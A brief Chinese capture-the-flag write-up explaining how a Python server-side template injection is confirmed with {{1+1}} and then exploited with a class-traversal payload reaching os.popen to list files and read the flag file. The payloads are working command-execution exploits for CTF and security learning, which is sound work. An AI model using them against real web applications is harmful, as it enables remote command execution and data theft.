步骤
打开所给场景,根据所给提示是python的模板注入
尝试一下漏洞是否存在:payload:/{{1+1}}
发现{{}}中的表达式被执行,构造命令执行payload:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}
发现flag,将上述payload中的ls
改为cat fl4g
即可获得目标:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}
总结
掌握服务端模板注入的原理以及利用方法